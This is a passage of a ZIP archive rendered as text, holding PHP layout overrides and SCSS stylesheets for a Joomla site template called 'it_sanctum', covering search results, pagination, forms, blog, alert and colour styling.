			<?php else : ?>
				<?php echo $result->title; ?>
			<?php endif; ?>
		</dt>
		<dd class="result-text">
			<?php echo $result->text; ?>
		</dd>
		<?php if ($this->params->get('show_date') || ($result->section)) : ?>
			<div class="search-item-info">
				<?php if ($this->params->get('show_date')) : ?>
					<dd class="result-created<?php echo $this->pageclass_sfx; ?>">
						<i class="fa fa-clock-o"></i><?php echo JText::sprintf($result->created); ?>
					</dd>
				<?php endif; ?>

				<?php if ($result->section) : ?>
					<dd class="result-category">
						<span class="small<?php echo $this->pageclass_sfx; ?>">
							<i class="fa fa-folder-open-o"></i><?php echo $this->escape($result->section); ?>
						</span>
					</dd>
				<?php endif; ?>
			</div>
		<?php endif; ?>
	</div>
<?php endforeach; ?>
</dl>

<div class="pagination">
	<?php echo $this->pagination->getPagesLinks(); ?>
</div>
PK!�L�1��it_sanctum/html/pagination.phpnu&1i�<?php
/**
 * @package Helix Framework
 * @author JoomShaper http://www.joomshaper.com
 * @copyright Copyright (c) 2010 - 2015 JoomShaper
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('resticted aceess');

function pagination_list_render($list) {
	// Initialize variables
	$html = '<ul class="pagination">';
	
	if ($list['start']['active']==1)   $html .= $list['start']['data'];
	if ($list['previous']['active']==1) $html .= $list['previous']['data'];

	foreach ($list['pages'] as $page) {
		$html .= $page['data'];
	}

	if ($list['next']['active']==1) $html .= $list['next']['data'];
	if ($list['end']['active']==1)  $html .= $list['end']['data'];

	$html .= "</ul>";
	
	return $html;
}

function pagination_item_active(&$item) {
	
	$cls = '';
	
    if ($item->text == JText::_('Next')) { $item->text = '&raquo;'; $cls = "next";}
    if ($item->text == JText::_('Prev')) { $item->text = '&laquo;'; $cls = "previous";}
    
	if ($item->text == JText::_('First')) { $cls = "first";}
    if ($item->text == JText::_('Last'))   { $cls = "last";}
	
    return "<li><a class='" . $cls . "' href='" . $item->link . "' title='" . $item->text . "'>" . $item->text . "</a></li>";
}

function pagination_item_inactive( &$item ) {
	$cls = (int)$item->text > 0 ? 'active': 'disabled';
	return "<li class='" . $cls . "'><a>" . $item->text . "</a></li>";
}
PK!O`��||"it_sanctum/scss/_dependencies.scssnu&1i�// Load Third Party Libraries
@import "vendor/bourbon/bourbon";

// Load Theme Configuration
@import "configuration/base";

// Load Nucleus Configuration
@import "configuration/nucleus/base";

// Load Nucleus Mixins and Functions
@import "nucleus/functions/base";
@import "nucleus/mixins/base";

// Load Theme Variable Driven Nucleus Elements
@import "nucleus/theme/mixins/base";
PK!_��*it_sanctum/scss/sanctum-joomla/_forms.scssnu&1i�legend {
	color: #333333;
}

legend small {
	color: #999999;
}

.input-prepend .chzn-container-single .chzn-single,
.input-append .chzn-container-single .chzn-single {
	border-color: $base-border-color;
}

.input-prepend .chzn-container-single .chzn-drop,
.input-append .chzn-container-single .chzn-drop {
	border-color: $base-border-color;
}

textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.uneditable-input {
	background-color: $white;
	border: 1px solid darken($base-border-color, 3%);
	box-shadow: none;
	padding: 10px;
	border-radius: 0;
	@include transition(border 0.2s linear, box-shadow 0.2s linear);
	&:focus {
		box-shadow: none;
	}
}

#g-aside, #g-sidebar, #g-offcanvas {
	input, textarea, .uneditable-input {
		width: 100%;
	}
	input[type="file"], input[type="image"], input[type="submit"], input[type="reset"], input[type="button"], input[type="radio"], input[type="checkbox"] {
		width: auto;
	}
}

#g-header, #g-navigation {
	.search {
		form {
			margin-bottom: 0;
		}
		input {
			margin-bottom: 0;
			border: 0;
		}
	}
}

// Mailto and Print Windows
.view-mailto, .body-only {
    #g-page-surround {
        box-shadow: none;
    }
}

PK!_���///it_sanctum/scss/sanctum-joomla/_revolution.scssnu&1i�.rev_slider_wrapper {
    .tp-caption {
    	a {
    		&.button {
    			color: #ffffff;
    			&.dark {
    				margin-left: 10px;
    			}
    		}
    	}
    }

    .tparrows:before {
        color: #FFFFFF;
        display: inline-block;
        font-family: FontAwesome,sans-serif;
        font-size: 20px;
        font-style: normal;
        font-weight: bold;
        margin-right: 0;
        margin-top: 2px;
        text-align: center;
        text-decoration: inherit;
        width: 35px;
    }
    .tparrows {
    	background: #000000;
        background: none repeat scroll 0 0 rgba(0, 0, 0, 0.4);
        border-radius: 5px;
        cursor: pointer;
        height: 35px;
        width: 35px;
        @include transition (background 0.3s, opacity 0.3s);
    }
    .tparrows:hover {
        color: #FFFFFF;
    }
    .tp-leftarrow:before {
        content: "\f104";
    }
    .tp-rightarrow:before {
        content: "\f105";
    }
    .tparrows.tp-rightarrow:before {
        margin-left: 1px;
    }
    .tparrows:hover {
        background: #000000;
    }
}PK!�>+it_sanctum/scss/sanctum-joomla/_search.scssnu&1i�.search {
	.search-form-results {
		width: 500px;
		margin: 0 auto;
		text-align: center;
		padding: 50px;
		border: 1px solid $base-border-color;
		margin-bottom: 70px;
		@include breakpoint(mobile-only) {
			width: 100%;
		}
		@include breakpoint(tablet-range) {
			width: 100%;
		}
		.btn-toolbar {
			margin-top: 0;
			.btn-group {
				float: none;
				margin: 0;
				input {
					width: 100%;
					margin: 0;
					border-right: none;
					@include breakpoint(small-mobile-range) {
						width: 120px;
					}
				}
				.btn {
					padding: 0.58rem 1rem !important;
					border-radius: 0 !important;
					> span {
						vertical-align: middle;
						margin: 0;
					}
				}
			}
		}
		.searchintro {
			> p {
				margin-bottom: 0;
			}
			.badge {
				background: $accent-color-1;
				border-radius: 0;
				text-shadow: none;
			}
		}
	}
	.search-add-options {
		padding: 50px;
		border: 1px solid $base-border-color;
		margin: 0 auto 50px;
		width: 600px;
		@include breakpoint(mobile-only) {
			width: 100%;
		}
		@include breakpoint(tablet-range) {
			width: 100%;
		}
		@include breakpoint(desktop-range) {
			width: 550px;
		}
		> fieldset {
			display: inline-block;
			&:first-child {
				margin-right: 50px;
				@include breakpoint(mobile-only) {
					margin-bottom: 50px;
				}
				@include breakpoint(tablet-range) {
					margin-bottom: 50px;
				}
			}
		}
	}
	.search-results {
		.result-item {
			padding: 40px 0 40px 50px;
			border-top: 1px solid $base-border-color;
			position: relative;
			.item-number {
				position: absolute;
				left: 0;
				border: 1px solid $base-border-color;
				text-align: center;
				width: 30px;
				height: 30px;
				line-height: 30px;
				border-radius: 0;
			}
			.result-title {
				line-height: 30px;
				h4 {
					a {
						color: $base-title-color;
						&:hover {
							color: $accent-color-1;
						}
					}
				}
			}
			dd {
				margin: 0;
			}
			.search-item-info {
				margin-top: 20px;
				dd {
					display: inline-block;
					margin-right: 20px;
					i {
						margin-right: 7px;
					}
				}
			}
		}
	}
}PK!�!�
�
)it_sanctum/scss/sanctum-joomla/_blog.scssnu&1i�.blog, .blog-featured {
	.category-desc {
		margin: -10px 0 30px;

	}
	.items-more {
		ol {
			padding-left: 0;
			margin: 0 0 60px 0;
		}
	}
	article {
		&.item {
			margin-bottom: 60px;
		}
	}
}

.item-page {
	ul.pager {
		margin-bottom: 0;
	}
}

article {
	.item-image {
		margin: 20px 0;
	}
}

.tag-category {
	li {
		h3 {
			margin: 10px 0;
			a {
				color: $base-title-color;
				&:hover {
					color: $accent-color-1;
				}
			}
		}
	}
	form {
		margin-bottom: 0;
	}
}

.g-article-header {
	position: relative;
	padding: 0;
	> .icons {
		position: relative;
		right: 0;
		top: 32px;
		right: 15px;
		.btn-group {
			.btn {
				background: transparent !important;
				border: 0px solid $white !important;
				padding: 0.3rem 0.6rem !important;
				[class^="icon-"], [class*=" icon-"] {
					color: $base-text-color !important;
					margin-right: 0px;
					@include breakpoint(mobile-only) {
						margin-top: 5px;
					}
				}
				.caret {
					display: none;
				}
				&:hover {
					color: $accent-color-1 !important;
				}
			}
		}
	}
	.page-header {
		h2 {
			margin: 0 0 -10px 0;
			a {
				color: $base-title-color;
				&:hover {
					color: $accent-color-1;
				}
			}
		}
	}
}

.readmore {
	margin: 0;
	.btn {
		span {
			display: none;
		}
	}
}

.tags {
	margin-bottom: 1.5rem;
}

.article-info {
	color: $mainbody-text-color;
	margin: 20px 0 0;
	background: transparent;
	border: 1px solid $base-border-color;
	padding: 1rem 1.5rem;
	a {
		color: $mainbody-text-color;
	}
	.article-info-term {
		display: none;
	}
	dd {
		display: inline-block;
		margin: 0 20px 0 0;
		i {
			margin-right: 5px;
		}
	}
	@include breakpoint(mobile-only) {
		text-align: center;
	}
}

.content-category {
	form {
		margin-bottom: 0;
	}
	.pagination {
		margin-bottom: 0;
		> ul {
			margin-bottom: 0;
			box-shadow: none;
		}
		.counter {
			margin-bottom: 0;
			@include breakpoint(mobile-only) {
				float: none;
			}
		}
	}
}

.pagination {
	margin: 0;
	ul {
		margin: 0;
		box-shadow: none;
		> li {
			> a, > span {
				color: inherit;
				padding: 0.675rem 1rem;
				margin-right: 5px;
				border: 1px solid $base-border-color;
				border-radius: 0px !important;
				@include transition(background 0.2s);
				&:hover {
					color: $white;
					background: $accent-color-1;
					border-color: $accent-color-1;
				}
			}
		}
		> .active {
			> a, > span {
				color: $white;
				background: $accent-color-1;
				border-color: $accent-color-1;
			}
		}
	}
	.counter {
		margin: 7px 0 0;
		@include breakpoint(mobile-only) {
			float: none;
		}
	}
}

.pager {
	li {
		a {
			color: inherit;
			border: 1px solid inherit;
			background: transparent;
			border-radius: 0px;
			padding: 0.675rem 1.5rem;
			&:hover {
				color: $white;
				background: $accent-color-1;
				border-color: $accent-color-1;
			}
		}
	}
}PK!�C*�/it_sanctum/scss/sanctum-joomla/_typography.scssnu&1i�// Lists and Tables
.list-striped,
.row-striped {
	border-top: 1px solid $base-border-color;
}

.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
	border-bottom: 1px solid $base-border-color;
}

.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
	background-color: lighten($off-white, 2%);
}

.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
	background-color: darken($off-white, 2%);
}

.list-bordered,
.row-bordered {
	border: 1px solid $base-border-color;
}

.row-even,
.row-odd {
	border-bottom: 1px solid $base-border-color;
}

.row-even {
	background-color: lighten($off-white, 2%);
}

.iframe-bordered {
	border: 1px solid $base-border-color;
}

// Blockquote and Code
blockquote {
	border-left: 5px solid $base-border-color;
}


blockquote small {
	color: lighten($base-text-color, 20%);
}

blockquote.pull-right {
	border-right: 5px solid $base-border-color;
}
PK!�mF<T
T
.it_sanctum/scss/sanctum-joomla/_utilities.scssnu&1i�
// Tooltips
.tip-wrap {
	color: #fff;
	background-color: #000;
}

// Search Highlight
.search span.highlight {
	background-color: lighten($off-white, 2%);
}

// Images
.img-polaroid {
	background-color: $white;
	border: 1px solid rgba(0, 0, 0, 0.2);
	box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}

// System Messages and Alerts
.muted {
	color: #999999;
}

a.muted:hover,
a.muted:focus {
	color: #808080;
}

.alert {
	background-color: lighten($warning-color, 41%);
	border-color: lighten($warning-color, 34%);

	a, a:hover, .alert-link, .alert-link:hover {
		color: darken($warning-color, 10%);
		font-weight: bold;

		&:hover {
			text-decoration: underline;
		}
	}
}

.alert,
.text-warning {
	color: $warning-color;
}

.alert h4 {
	color: $warning-color !important;
}

a.text-warning:hover,
a.text-warning:focus {
	color: darken($warning-color, 5%);
}

.alert-success {
	color: $success-color;
	background-color: lighten($success-color, 50%);
	border-color: lighten($success-color, 42%);

	a, a:hover, .alert-link, .alert-link:hover {
		color: darken($success-color, 10%);
		font-weight: bold;

		&:hover {
			text-decoration: underline;
		}
	}
}

.text-success {
	color: $success-color;
}

.alert-success h4 {
	color: $success-color !important;
}

a.text-success:hover,
a.text-success:focus {
	color: darken($success-color, 5%);
}

.alert-danger,
.alert-error {
	color: $error-color;
	background-color: lighten($error-color, 43%);
	border-color: lighten($error-color, 37%);

	a, a:hover, .alert-link, .alert-link:hover {
		color: darken($error-color, 10%);
		font-weight: bold;

		&:hover {
			text-decoration: underline;
		}
	}
}

.text-error {
	color: $error-color;
}

.alert-danger h4,
.alert-error h4 {
	color: $error-color !important;
}

a.text-error:hover,
a.text-error:focus {
	color: darken($error-color, 5%);
}

.alert-info {
	color: $info-color;
	background-color: lighten($info-color, 47%);
	border-color: lighten($info-color, 40%);

	a, a:hover, .alert-link, .alert-link:hover {
		color: darken($info-color, 10%);
		font-weight: bold;

		&:hover {
			text-decoration: underline;
		}
	}
}

.text-info {
	color: $info-color;
}

.alert-info h4 {
	color: $info-color !important;
}

a.text-info:hover,
a.text-info:focus {
	color: darken($info-color, 5%);
}

// Fix for input box-sizing
.platform-content input {
	box-sizing: inherit;
}

// Fix for form-action
.form-actions {
	background-color: transparent;
	border: none;
	margin: 0;
	padding: 0;
}

// Joomla class for the Search
.element-invisible {
    border: 0 none;
    height: 1px;
    margin: 0;
    overflow: hidden;
    padding: 0;
    position: absolute;
    width: 1px;
}PK!?�ٌEE-it_sanctum/scss/sanctum-joomla/_contacts.scssnu&1i�.contact {
	> h3 {
		display: none;
	}
	.contact-address {
		margin: 0;
	}
	#contact-form {
		margin-bottom: 0;
		fieldset {
			> legend {
				font-size: $fontsizes-body-font-size*1;
				color: $mainbody-heading-color;
				margin-bottom: 0;
			}
		}
		&.form-horizontal {
			.control-label {
				text-align: left;
			}
		}
		input, textarea {
			width: 100%;
			@include breakpoint(mobile-only) {
				width: 100%;
			}
			@include breakpoint(tablet-range) {
				width: 100%;
			}
		}
		#jform_contact_email_copy {
			width: 10px;
		}
		label {
			margin-top: 3px;
		}
		#jform_contact_email_copy-lbl {
			margin-top: 0;
		}
		.form-actions {
			@include breakpoint(mobile-only) {
				padding: 0;
				> button {
					display: block;
					width: 100%;
				}
			}
		}
		&.well {
			border: none;
			padding: 0;
			background: none;
		}
	}
}PK!
�
*it_sanctum/scss/sanctum-joomla/_uikit.scssnu&1i�.uk-dotnav,
.uk-dotnav-contrast {
	> * {
		> * {
			border-radius: 0px !important;
			background: rgba(0,0,0,0.1) !important;
		}
	}
	> .uk-active {
		> * {
			background: rgba(0,0,0,0.2) !important;
		}
	}
}

.g-container {
	.uk-slidenav-position {
		.uk-slidenav {
			border-radius: 0;
			background: transparent;
			font-size: 50px;
			color: rgba(0,0,0,0.3);
			@include transition(color 0.2s);
			&:hover {
				color: $accent-color-1;
			}
		}
	}
}

.uk-modal {
	.uk-slidenav-position {
		.uk-slidenav {
			border-radius: 0;
			background: transparent;
			font-size: 50px;
			color: rgba(0,0,0,0.3);
			@include transition(color 0.2s);
			&:hover {
				color: $accent-color-1;
			}
		}
	}
}

.uk-grid-divider > * {
	padding-left: 35px !important;
	margin-bottom: 20px !important;
}PK!i�vhhh/it_sanctum/scss/sanctum-joomla/_breadcrumb.scssnu&1i�ul.breadcrumb {
	margin: 6px 0 0;
	padding: 0;
	background: none;
	text-align: center;
	@include breakpoint(mobile-only) {
		margin: 0;
	}
	li {
		text-shadow: none;
		.divider {
			display: none;
		}
		+ li {
			&:after {
				content: "/ ";
				padding: 0 5px;
			}
			&:last-child {
				&:after {
					content: none;
					padding: 0;
				}
			}
		}
	}
}

.g-grid {
	> .g-block {
		&:last-child {
			ul.breadcrumb {
				@include breakpoint(mobile-only) {
					text-align: center;
				}
			}
		}
		&:first-child {
			ul.breadcrumb {
				@include breakpoint(mobile-only) {
					text-align: center;
				}
			}
		}
	}
}PK! *�&&)it_sanctum/scss/sanctum-joomla/_core.scssnu&1i�.btn-group > .btn + .dropdown-toggle {
	box-shadow: 1px 1px 1px rgba(0,0,0,0.1);
}

.btn-group.open .btn-primary.dropdown-toggle {
	background: darken($accent-color-1, 5%);
	color: $white;
	box-shadow: inset -1px -1px 1px rgba(0,0,0,0.15);
}

.dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a {
	background-image: none;
	background-color: $accent-color-1;
}

.btn-link {
	color: $accent-color-1;
}

// Joomla Login Module
#login-form {
	margin-bottom: 0;
	#form-login-remember {
		margin: 20px 0 10px;
		input {
			margin: 0 5px 0 0;
		}
	}
	ul.unstyled {
		margin: 20px 0 0;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
			i {
				margin-right: 7px;
			}
		}
	}
}

// Joomla Menu Module
.nav {
	&.menu {
		margin: 0;
		li {
			margin-bottom: 6.5px;
			&:last-child {
				margin-bottom: 0;
			}
			a {
				color: $base-title-color;
				&:before {
					content:"\f105";
					font-family: FontAwesome;
					margin-right: rem(10px);
				}
				&:hover {
					color: $accent-color-1;
				}
			}
			span {
				&:before {
					content:"\f105";
					font-family: FontAwesome;
					margin-right: rem(10px);
				}
			}
			ul {
				margin-top: 6.5px;
				margin-bottom: 6.5px;
			}
			&.current {
				> a, > span {
					color: $accent-color-1;
				}
			}
		}
	}
}

// Bootstrap "well" styling
.well {
	background: transparent;
	border: 1px solid $base-border-color;
	border-radius: 0;
	box-shadow: none;
	padding: 30px 30px 10px;
}

// Joomla Login Page
.login {
	> form {
		fieldset {
			.control-group {
				.control-label {
					text-align: left;
					padding-top: 10px;
				}
				#remember {
					margin-top: 10px;
					@include breakpoint(mobile-only) {
						width: auto;
					}
				}
				input {
					@include breakpoint(mobile-only) {
						width: 100%;
					}
				}
			}
		}
	}
}

.logout {
	.controls {
		margin-left: 0;
	}
}

ul.nav-tabs.nav-stacked {
	> li {
		> a {
			border-radius: 0 !important;
			border: 1px solid $base-border-color;
			&:hover {
				border: 1px solid $base-border-color;
			}
		}
	}
}

// Joomla Registration Page
.registration {
	#member-registration {
		margin-bottom: 0;
		legend + .control-group {
			margin-top: 0;
		}
		.control-group {
			.control-label {
				text-align: left;
				padding-top: 10px;
			}
			input {
				@include breakpoint(mobile-only) {
					width: 100%;
				}
			}
		}
	}
}

// Joomla Username Remind and Password Reset Pages
.remind, .reset {
	#user-registration {
		margin-bottom: 0;
		fieldset {
			p {
				margin-top: 0;
			}
		}
		.control-group {
			.control-label {
				text-align: left;
				padding-top: 10px;
			}
		}
	}
}

// Joomla User Profile Page
.profile {
	> ul.btn-toolbar {
		margin-top: 0;
	}
	#users-profile-core {
		margin-bottom: 20px;
	}
	fieldset {
		dl {
			dt {
				text-align: left;
			}
		}
	}
}

// Joomla User Edit Profile
.profile-edit {
	#member-profile {
		margin-bottom: 0;
		.control-group {
			.control-label {
				text-align: left;
				padding-top: 10px;
			}
			.chzn-container {
				padding-top: 8px;
			}
		}
	}
}PK!l��6��*it_sanctum/scss/sanctum-joomla/_nssp2.scssnu&1i�.nssp2 {
	.ns2-title {
		margin: 0 0 10px;
		font-size: $fontsizes-body-font-size*1.15;
		font-weight: normal;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.ns2-introtext {
		margin: 0;
	}
	.ns2-social {
		span {
			margin-left: 0 !important;
			margin-right: 10px;
		}
	}
	.ns2-rating {
		margin-bottom: 10px;
	}
	.ns2-links {
		margin-top: 10px;
		font-size: $fontsizes-body-font-size*0.9;
		.ns2-created {
			margin-right: 15px;
			&:before {
				content: "\f017";
				font-family: FontAwesome;
				margin-right: 2px;
			}
		}
		.ns2-author {
			margin-right: 15px;
			&:before {
				content: "\f007";
				font-family: FontAwesome;
				margin-right: 2px;
			}
		}
		.ns2-category {
			margin-right: 15px;
			a {
				color: $base-text-color;
				&:before {
					content: "\f07c";
					font-family: FontAwesome;
					margin-right: 2px;
				}
				&:hover {
					color: $accent-color-1;
				}
			}
		}
		.ns2-comments {
			margin: 0;
			margin-right: 15px;
			color: $base-text-color;
			background: none;
			padding: 0;
			font-size: inherit;
			&:before {
				content: "\f086";
				font-family: FontAwesome;
				margin-right: 6px;
			}
			&:hover {
				color: $accent-color-1;
			}
		}
		.ns2-hits {
			margin-right: 15px;
			background: none;
			padding: 0;
			color: $base-text-color;
			font-size: inherit;
			&:before {
				content: "\f06e";
				font-family: FontAwesome;
				margin-right: 6px;
			}
		}
		.ns2-readmore {
			margin: 0;
			margin-right: 15px;
			color: $base-text-color;
			span {
				background: none;
				padding: 0;
				font-size: inherit;
			}
			&:before {
				content: "\f0c1";
				font-family: FontAwesome;
				margin-right: 6px;
			}
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.ns2-page-inner-custom {
		overflow: hidden;
		> div {
			margin-bottom: 30px;
			&:last-child {
				margin-bottom: 0;
			}
		}
	}
	.ns2-image-link {
		position: relative;
		&:hover {
			.ns2-image-overlay {
				opacity: 1;
			}
		}
		@include breakpoint(small-mobile-range) {
			margin-bottom: 15px;
		}
	}
	.ns2-image-overlay {
		background: rgba(0, 0, 0, 0.5);
		color: #ffffff;
		padding: 20px;
		position: absolute;
		top: 0;
		bottom: 0;
		left: 0;
		right: 0;
		opacity: 0;
		@include transition(opacity 0.3s);
		&:before {
			font-size: 25px;
			height: 25px;
			width: 25px;
			margin-left: -11px;
			margin-top: -17px;
			color: #ffffff;
			position: absolute;
			left: 50%;
			top: 50%;
			content: "\f0c1";
			font-family: FontAwesome;
		}
	}
	// Pagination and arrows
	.ns2-wrap {
		position: relative;
		.ns2-art-controllers {
			position: absolute;
			top: -58px;
			right: 0;
			.ns2-art-prev, .ns2-links-prev, .ns2-art-play, .ns2-links-play, .ns2-art-pause, .ns2-links-pause, .ns2-art-next, .ns2-links-next, .ns2-art-pagination span, .ns2-links-pagination span {
				background: none;
				text-indent: 0;
				height: auto;
				width: auto;
			}
			.ns2-art-pagination, .ns2-links-pagination {
				span {
					color: $base-text-color;
					@include transition(color 0.2s);
					&:hover, &.active {
						color: lighten($base-text-color, 20%);
					}
				}
			}
			.ns2-art-prev, .ns2-links-prev, .ns2-art-next, .ns2-links-next {
				padding: 5px 10px;
				background: $accent-color-1;
				color: #ffffff;
				border-radius: 3px;
				font-size: 11px;
				margin-top: -4px;
				margin-right: 0;
				margin-left: 5px;
				@include transition(all 0.2s);
				i {
					vertical-align: middle;
				}
				&:hover {
					background: $base-title-color;
				}
			}
		}
	}
}

.footer {
	.nssp2 {
		.ns2-title {
			font-size: $fontsizes-body-font-size;
			margin: 0;
		}
	}
	.ns2-page-inner-custom {
		> div {
			margin: 0;
			border-bottom: 1px solid lighten($footer-background-color, 5%);
			&:last-child {
				border: none;
				.ns2-column {
					> div {
						padding-bottom: 0 !important;
					}
				}
			}
		}
		.ns2-first {
			.ns2-column {
				> div {
					padding-top: 0 !important;
				}
			}
		}
	}
}PK!��%t)it_sanctum/scss/sanctum-joomla/_tabs.scssnu&1i�.nav-tabs.nav-dark {
	border-bottom: 1px solid #333;
	text-shadow: 1px 1px 1px #000;
}

.nav-tabs.nav-dark > li > a {
	color: #F8F8F8;
}

.nav-tabs.nav-dark > li > a:hover {
	border-color: #333 #333 #111;
	background-color: #777777;
}

.nav-tabs.nav-dark > .active > a,
.nav-tabs.nav-dark > .active > a:hover {
	color: #ffffff;
	background-color: #555555;
	border: 1px solid #222;
}
PK!|�?�it_sanctum/scss/sanctum.scssnu&1i�// REQUIRED DEPENDENCIES - DO NOT CHANGE

@import "dependencies";


// THEME COMPONENTS
@import "nucleus/theme/base";

// Core
@import "sanctum/core";

// Typography
@import "sanctum/typography";

// Navigation
@import "sanctum/navigation";

// Main Nav
@import "sanctum/mainnav";

// Menu
@import "sanctum/menu";

// Sidepanel Off Canvas
@import "sanctum/offcanvas";

// Drawer
@import "sanctum/drawer";

// Top
@import "sanctum/top";

// Header
@import "sanctum/header";

// Breadcrumb
@import "sanctum/breadcrumb";

// Fullwidth
@import "sanctum/fullwidth";

// Showcase
@import "sanctum/showcase";

// Intro
@import "sanctum/intro";

// Feature
@import "sanctum/feature";

// Subfeature
@import "sanctum/subfeature";

// Utility
@import "sanctum/utility";

// Maintop
@import "sanctum/maintop";

// System Messages
@import "sanctum/systemmessages";

// Sidebar
@import "sanctum/sidebar";

// Mainbody
@import "sanctum/mainbody";

// Aside
@import "sanctum/aside";

// Mainbottom
@import "sanctum/mainbottom";

// Extension
@import "sanctum/extension";

// Additional
@import "sanctum/additional";

// Prebottom
@import "sanctum/prebottom";

// Bottom
@import "sanctum/bottom";

// Afterbottom
@import "sanctum/afterbottom";

// Last
@import "sanctum/last";

// Footer
@import "sanctum/footer";

// Copyright
@import "sanctum/copyright";

// To Top
@import "sanctum/to-top";

// Variations
@import "sanctum/variations";

// Tables
@import "sanctum/tables";

// Forms
@import "sanctum/forms";

// Error Page
@import "sanctum/error";

// Social
@import "sanctum/social";

// Dropdown Animations
@import "sanctum/dropdownanimations";

// Content Array
@import "sanctum/contentarray";

// Contacts
@import "sanctum/contacts";

// Modal Search
@import "sanctum/modal-search";

// Offcasnvas Toggle
@import "sanctum/offcanvas-toggle";

// Features Particle
@import "sanctum/features-particle";

// Image Features Particle
@import "sanctum/image-features";

// Content PRO Particle
@import "sanctum/content-pro";

// Content PRO Joomla Particle
@import "sanctum/content-pro-joomla";

// Slideshow Particle
@import "sanctum/slideshow";

// Main Feature Particle
@import "sanctum/main-feature";

// Media Box Particle
@import "sanctum/media-box";

// PayPal Donate Particle
@import "sanctum/paypal-donate";

// Portfolio Particle
@import "sanctum/portfolio";

// Call-to-action Button Particle
@import "sanctum/cta-button";

// Page Titles Particle
@import "sanctum/page-title";

// Our Team Particle
@import "sanctum/our-team";

// OnePage Menu Particle
@import "sanctum/onepage-menu";

// Particle Overrides
@import "sanctum/particle-overrides";

// Bootstrap Buttons
@import "sanctum/bs-buttons";

//-------------------------------------------

// BREAKPOINTS
@import "nucleus/theme/breakpoints/base";

//-------------------------------------------PK!�c�..(it_sanctum/scss/configuration/_core.scssnu&1i�// Content Block Spacing Variables
$content-margin:				0.625rem !default;
$content-padding:				0.938rem !default;

// Border Radius
$core-border-radius:			0 !default;

// Padding
$section-padding:				3rem;

// Offcanvas
$offcanvas-width:				17rem !default;
$offcanvas-toggle-position:		"left" !default;PK!��((*it_sanctum/scss/configuration/_colors.scssnu&1i�// Basics
$white:										#ffffff;
$black:										#000000;
$off-white:									#f7f7f7;

// Base
$base-background-color:						#ffffff !default;
$base-text-color:							#959595 !default;
$base-border-color:							#dddddd !default;
$base-title-color:							#282828 !default;
$base-element-color:						#dddddd !default;
$base-background-image:						false !default;
$base-background-repeat:					no-repeat !default;
$base-background-size:						auto !default;
$base-background-attachment:				scroll !default;

// Accents
$accent-color-1:							#c91f37 !default;
$accent-color-2:							#282828 !default;
$accent-color-3: 							#68ad53 !default;


// Drawer
$drawer-background-color:					#ffffff !default;
$drawer-background-image:					false !default;
$drawer-background-repeat:					no-repeat !default;
$drawer-background-size:					auto !default;
$drawer-background-attachment:				scroll !default;
$drawer-text-color:							#959595 !default;
$drawer-heading-color:						#282828 !default;

// Top
$top-background-color:						#ffffff !default;
$top-background-image:						false !default;
$top-background-repeat:						no-repeat !default;
$top-background-size:						auto !default;
$top-background-attachment:					scroll !default;
$top-text-color:							#959595 !default;
$top-heading-color:							#282828 !default;

// Header
$header-background-color:					#ffffff !default;
$header-background-image:					false !default;
$header-background-repeat:					no-repeat !default;
$header-background-size:					auto !default;
$header-background-attachment:				scroll !default;
$header-text-color:							#959595 !default;
$header-heading-color:						#282828 !default;

// Navigation
$navigation-background-color:				#ffffff !default;
$navigation-background-image:				false !default;
$navigation-background-repeat:				no-repeat !default;
$navigation-background-size:				auto !default;
$navigation-background-attachment:			scroll !default;
$navigation-text-color:						#959595 !default;
$navigation-heading-color:					#959595 !default;

// Breadcrumb
$breadcrumb-background-color:				#ffffff !default;
$breadcrumb-background-image:				false !default;
$breadcrumb-background-repeat:				no-repeat !default;
$breadcrumb-background-size:				auto !default;
$breadcrumb-background-attachment:			scroll !default;
$breadcrumb-text-color:						#959595 !default;
$breadcrumb-heading-color:					#282828 !default;

// Fullwidth
$fullwidth-background-color:				#f7f7f7 !default;
$fullwidth-background-image:				false !default;
$fullwidth-background-repeat:				no-repeat !default;
$fullwidth-background-size:					auto !default;
$fullwidth-background-attachment:			scroll !default;
$fullwidth-text-color:						#959595 !default;
$fullwidth-heading-color:					#282828 !default;

// Showcase
$showcase-background-color:					#ffffff !default;
$showcase-background-image:					false !default;
$showcase-background-repeat:				no-repeat !default;
$showcase-background-size:					auto !default;
$showcase-background-attachment:			scroll !default;
$showcase-text-color:						#6f6f6f !default;
$showcase-heading-color:					#282828 !default;

// Intro
$intro-background-color:					#f7f7f7 !default;
$intro-background-image:					false !default;
$intro-background-repeat:					no-repeat !default;
$intro-background-size:						auto !default;
$intro-background-attachment:				scroll !default;
$intro-text-color:							#959595 !default;
$intro-heading-color:						#282828 !default;

// Feature
$feature-background-color:					#ffffff !default;
$feature-background-image:					false !default;
$feature-background-repeat:					no-repeat !default;
$feature-background-size:					auto !default;
$feature-background-attachment:				scroll !default;
$feature-text-color:						#959595 !default;
$feature-heading-color:						#282828 !default;

// Subfeature
$subfeature-background-color:				#f7f7f7 !default;
$subfeature-background-image:				false !default;
$subfeature-background-repeat:				no-repeat !default;
$subfeature-background-size:				auto !default;
$subfeature-background-attachment:			scroll !default;
$subfeature-text-color:						#959595 !default;
$subfeature-heading-color:					#282828 !default;

// Utility
$utility-background-color:					#ffffff !default;
$utility-background-image:					false !default;
$utility-background-repeat:					no-repeat !default;
$utility-background-size:					auto !default;
$utility-background-attachment:				scroll !default;
$utility-text-color:						#959595 !default;
$utility-heading-color:						#282828 !default;

// Maintop
$maintop-background-color:					#f7f7f7 !default;
$maintop-background-image:					false !default;
$maintop-background-repeat:					no-repeat !default;
$maintop-background-size:					auto !default;
$maintop-background-attachment:				scroll !default;
$maintop-text-color:						#959595 !default;
